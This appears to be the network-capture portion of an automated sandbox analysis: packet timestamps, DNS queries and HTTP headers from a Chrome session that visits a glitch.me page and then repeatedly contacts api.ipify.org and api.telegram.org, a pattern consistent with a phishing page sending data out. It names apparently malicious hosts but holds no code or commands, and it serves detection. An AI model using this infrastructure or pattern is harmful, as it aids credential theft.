                                        Jan 14, 2025 18:22:41.221334934 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:41.221396923 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:41.222395897 CET49839443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:41.222414970 CET44349839149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:50.720947981 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:50.720997095 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:50.721080065 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:50.724090099 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:50.724103928 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.196352005 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.196633101 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.196650028 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.196975946 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.197267056 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.197321892 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.197405100 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.243326902 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.361154079 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.361222029 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.361340046 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.363733053 CET49909443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.363753080 CET44349909104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.366297960 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:51.366324902 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.366792917 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:51.367182970 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:51.367197037 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.367670059 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.367708921 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.367767096 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.367917061 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.367928028 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.825015068 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.825311899 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.825337887 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.825623989 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.825925112 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.825984955 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.826191902 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.867341995 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.959830999 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.959923029 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.960017920 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.960949898 CET49912443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:22:51.960971117 CET44349912104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:22:51.978560925 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.978809118 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:51.978840113 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.979173899 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.979468107 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:51.979526997 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:51.979587078 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.023358107 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.267667055 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.267745018 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.267811060 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.268559933 CET49911443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.268600941 CET44349911149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.271605968 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.271647930 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.271718025 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.271934032 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.271950006 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.904042006 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.904373884 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.904438019 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.904764891 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.905078888 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.905150890 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:52.905232906 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:52.951328993 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:53.230820894 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:53.230891943 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:22:53.230987072 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:53.232618093 CET49918443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:22:53.232661009 CET44349918149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:05.787764072 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:05.787775040 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:05.787846088 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:05.788234949 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:05.788247108 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.259368896 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.264710903 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.264780998 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.265402079 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.305799961 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.314048052 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.314141989 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.320521116 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.363337994 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.476267099 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.476339102 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.476397991 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.477155924 CET50000443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.477173090 CET44350000104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.479795933 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:06.479830027 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:06.480200052 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:06.480200052 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:06.480230093 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:06.481456041 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.481503010 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.481739044 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.481800079 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.481812000 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.963252068 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.963619947 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.963634968 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.963994980 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.964390039 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:06.964447975 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:06.964631081 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:07.007332087 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:07.123666048 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.123975039 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.123984098 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.124317884 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.124641895 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.124697924 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.124799013 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.135159016 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:07.135207891 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:07.135262012 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:07.136096954 CET50005443192.168.2.6104.26.12.205
                                        Jan 14, 2025 18:23:07.136116982 CET44350005104.26.12.205192.168.2.6
                                        Jan 14, 2025 18:23:07.167344093 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.484579086 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.484766960 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.484812975 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.485965014 CET50004443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.485970974 CET44350004149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.488643885 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.488666058 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:07.488734961 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.488914967 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:07.488923073 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.128253937 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.128840923 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.128855944 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.129360914 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.130203009 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.130301952 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.130354881 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.175327063 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.180767059 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.458435059 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.458508968 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:08.458904982 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.460571051 CET50006443192.168.2.6149.154.167.220
                                        Jan 14, 2025 18:23:08.460593939 CET44350006149.154.167.220192.168.2.6
                                        Jan 14, 2025 18:23:09.117985010 CET49715443192.168.2.634.233.109.53
                                        Jan 14, 2025 18:23:09.118000031 CET4434971534.233.109.53192.168.2.6
                                        Jan 14, 2025 18:23:21.917098045 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:21.917131901 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:21.917248011 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:21.917634964 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:21.917645931 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:22.567574024 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:22.568805933 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:22.568841934 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:22.569933891 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:22.570280075 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:22.570456028 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:22.618227959 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:25.980027914 CET49715443192.168.2.634.233.109.53
                                        Jan 14, 2025 18:23:25.980242968 CET4434971534.233.109.53192.168.2.6
                                        Jan 14, 2025 18:23:25.980325937 CET49715443192.168.2.634.233.109.53
                                        Jan 14, 2025 18:23:32.463937998 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:32.464003086 CET44350008142.250.186.164192.168.2.6
                                        Jan 14, 2025 18:23:32.464255095 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:33.980758905 CET50008443192.168.2.6142.250.186.164
                                        Jan 14, 2025 18:23:33.980799913 CET44350008142.250.186.164192.168.2.6

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 14, 2025 18:22:17.731888056 CET53514471.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:17.756982088 CET53646101.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:18.743664980 CET53619661.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:21.853024960 CET5692353192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:21.853147030 CET6198553192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:21.859777927 CET53619851.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:21.860155106 CET53569231.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:23.355478048 CET5136653192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:23.355815887 CET5512053192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:23.370721102 CET53551201.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:23.377526045 CET53513661.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:24.229125023 CET5587553192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:24.229242086 CET5210153192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:24.242923975 CET53558751.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:24.392534971 CET53521011.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:25.156393051 CET6028753192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:25.156651020 CET6052753192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:25.165543079 CET53605271.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:25.165555000 CET53602871.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:25.219176054 CET53568441.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:26.393668890 CET5562253192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:26.394009113 CET5576153192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:26.400921106 CET53556221.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:26.401119947 CET53557611.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:27.825103045 CET6343453192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:27.825556040 CET5470453192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:27.839629889 CET53634341.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:27.842057943 CET53547041.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:35.861057997 CET53527691.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:38.661484957 CET6054153192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:38.661658049 CET6002153192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:38.668438911 CET53600211.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:38.668883085 CET53605411.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:39.263542891 CET5539953192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:39.263663054 CET6409053192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:39.265769005 CET5384153192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:39.265917063 CET6483953192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:39.270199060 CET53553991.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:39.271066904 CET53640901.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:39.272507906 CET53538411.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:39.273425102 CET53648391.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:40.255341053 CET5010553192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:40.255486965 CET6493553192.168.2.61.1.1.1
                                        Jan 14, 2025 18:22:40.262018919 CET53501051.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:40.275082111 CET53649351.1.1.1192.168.2.6
                                        Jan 14, 2025 18:22:54.580982924 CET53611961.1.1.1192.168.2.6
                                        Jan 14, 2025 18:23:17.300436974 CET53599601.1.1.1192.168.2.6
                                        Jan 14, 2025 18:23:17.316245079 CET53608371.1.1.1192.168.2.6

                                        ICMP Packets

                                        TimestampSource IPDest IPChecksumCodeType
                                        Jan 14, 2025 18:22:24.392714977 CET192.168.2.61.1.1.1c23c(Port unreachable)Destination Unreachable

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jan 14, 2025 18:22:21.853024960 CET192.168.2.61.1.1.10x309Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:21.853147030 CET192.168.2.61.1.1.10x8a37Standard query (0)www.google.com65IN (0x0001)false
                                        Jan 14, 2025 18:22:23.355478048 CET192.168.2.61.1.1.10x7e6fStandard query (0)savory-sweet-felidae-psrnd.glitch.meA (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:23.355815887 CET192.168.2.61.1.1.10xa788Standard query (0)savory-sweet-felidae-psrnd.glitch.me65IN (0x0001)false
                                        Jan 14, 2025 18:22:24.229125023 CET192.168.2.61.1.1.10x3bb8Standard query (0)www.nordicplow.comA (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:24.229242086 CET192.168.2.61.1.1.10xce67Standard query (0)www.nordicplow.com65IN (0x0001)false
                                        Jan 14, 2025 18:22:25.156393051 CET192.168.2.61.1.1.10x9107Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:25.156651020 CET192.168.2.61.1.1.10x9523Standard query (0)upload.wikimedia.org65IN (0x0001)false
                                        Jan 14, 2025 18:22:26.393668890 CET192.168.2.61.1.1.10xd072Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:26.394009113 CET192.168.2.61.1.1.10x5e89Standard query (0)upload.wikimedia.org65IN (0x0001)false
                                        Jan 14, 2025 18:22:27.825103045 CET192.168.2.61.1.1.10x861eStandard query (0)www.nordicplow.comA (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:27.825556040 CET192.168.2.61.1.1.10x306Standard query (0)www.nordicplow.com65IN (0x0001)false
                                        Jan 14, 2025 18:22:38.661484957 CET192.168.2.61.1.1.10x3aeaStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:38.661658049 CET192.168.2.61.1.1.10x28f2Standard query (0)api.ipify.org65IN (0x0001)false
                                        Jan 14, 2025 18:22:39.263542891 CET192.168.2.61.1.1.10xc20eStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:39.263663054 CET192.168.2.61.1.1.10x12c0Standard query (0)api.telegram.org65IN (0x0001)false
                                        Jan 14, 2025 18:22:39.265769005 CET192.168.2.61.1.1.10xbbcStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:39.265917063 CET192.168.2.61.1.1.10xc186Standard query (0)api.ipify.org65IN (0x0001)false
                                        Jan 14, 2025 18:22:40.255341053 CET192.168.2.61.1.1.10x7ec6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:40.255486965 CET192.168.2.61.1.1.10x5f76Standard query (0)api.telegram.org65IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jan 14, 2025 18:22:21.859777927 CET1.1.1.1192.168.2.60x8a37No error (0)www.google.com65IN (0x0001)false
                                        Jan 14, 2025 18:22:21.860155106 CET1.1.1.1192.168.2.60x309No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:23.377526045 CET1.1.1.1192.168.2.60x7e6fNo error (0)savory-sweet-felidae-psrnd.glitch.me34.233.109.53A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:23.377526045 CET1.1.1.1192.168.2.60x7e6fNo error (0)savory-sweet-felidae-psrnd.glitch.me34.235.224.68A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:23.377526045 CET1.1.1.1192.168.2.60x7e6fNo error (0)savory-sweet-felidae-psrnd.glitch.me34.234.192.54A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:23.377526045 CET1.1.1.1192.168.2.60x7e6fNo error (0)savory-sweet-felidae-psrnd.glitch.me44.194.192.230A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:23.377526045 CET1.1.1.1192.168.2.60x7e6fNo error (0)savory-sweet-felidae-psrnd.glitch.me54.145.102.19A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:23.377526045 CET1.1.1.1192.168.2.60x7e6fNo error (0)savory-sweet-felidae-psrnd.glitch.me44.206.124.177A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:23.377526045 CET1.1.1.1192.168.2.60x7e6fNo error (0)savory-sweet-felidae-psrnd.glitch.me18.215.21.8A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:23.377526045 CET1.1.1.1192.168.2.60x7e6fNo error (0)savory-sweet-felidae-psrnd.glitch.me34.237.47.184A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:24.242923975 CET1.1.1.1192.168.2.60x3bb8No error (0)www.nordicplow.comnordicplow.comCNAME (Canonical name)IN (0x0001)false
                                        Jan 14, 2025 18:22:24.242923975 CET1.1.1.1192.168.2.60x3bb8No error (0)nordicplow.com192.124.249.155A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:24.392534971 CET1.1.1.1192.168.2.60xce67No error (0)www.nordicplow.comnordicplow.comCNAME (Canonical name)IN (0x0001)false
                                        Jan 14, 2025 18:22:25.165555000 CET1.1.1.1192.168.2.60x9107No error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:26.400921106 CET1.1.1.1192.168.2.60xd072No error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:27.839629889 CET1.1.1.1192.168.2.60x861eNo error (0)www.nordicplow.comnordicplow.comCNAME (Canonical name)IN (0x0001)false
                                        Jan 14, 2025 18:22:27.839629889 CET1.1.1.1192.168.2.60x861eNo error (0)nordicplow.com192.124.249.155A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:27.842057943 CET1.1.1.1192.168.2.60x306No error (0)www.nordicplow.comnordicplow.comCNAME (Canonical name)IN (0x0001)false
                                        Jan 14, 2025 18:22:38.668438911 CET1.1.1.1192.168.2.60x28f2No error (0)api.ipify.org65IN (0x0001)false
                                        Jan 14, 2025 18:22:38.668883085 CET1.1.1.1192.168.2.60x3aeaNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:38.668883085 CET1.1.1.1192.168.2.60x3aeaNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:38.668883085 CET1.1.1.1192.168.2.60x3aeaNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:39.270199060 CET1.1.1.1192.168.2.60xc20eNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:39.272507906 CET1.1.1.1192.168.2.60xbbcNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:39.272507906 CET1.1.1.1192.168.2.60xbbcNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:39.272507906 CET1.1.1.1192.168.2.60xbbcNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                        Jan 14, 2025 18:22:39.273425102 CET1.1.1.1192.168.2.60xc186No error (0)api.ipify.org65IN (0x0001)false
                                        Jan 14, 2025 18:22:40.262018919 CET1.1.1.1192.168.2.60x7ec6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • savory-sweet-felidae-psrnd.glitch.me
                                        • https:
                                          • www.nordicplow.com
                                          • upload.wikimedia.org
                                          • api.ipify.org
                                          • api.telegram.org

                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.64971634.233.109.534436212C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-14 17:22:24 UTC679OUTGET / HTTP/1.1
                                        Host: savory-sweet-felidae-psrnd.glitch.me
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-14 17:22:24 UTC506INHTTP/1.1 200 OK
                                        Date: Tue, 14 Jan 2025 17:22:24 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 1266
                                        Connection: close
                                        x-amz-id-2: cOqOYwsJw5pIaToCWfy92TzalJB7EK3jEiVbVESRNjbkOHKoNcVjCJZWuKUUDkMkn+vZmzSN90o=
                                        x-amz-request-id: V280E9VFQQVQEGZH
                                        last-modified: Tue, 14 Jan 2025 09:35:25 GMT
                                        etag: "548469b1563d7e4026cdb3357654dedf"
                                        x-amz-server-side-encryption: AES256
                                        cache-control: no-cache
                                        x-amz-version-id: ymrDhO0FHD9p_bNXzXBah3tF2KODSzQg
                                        accept-ranges: bytes
                                        server: AmazonS3
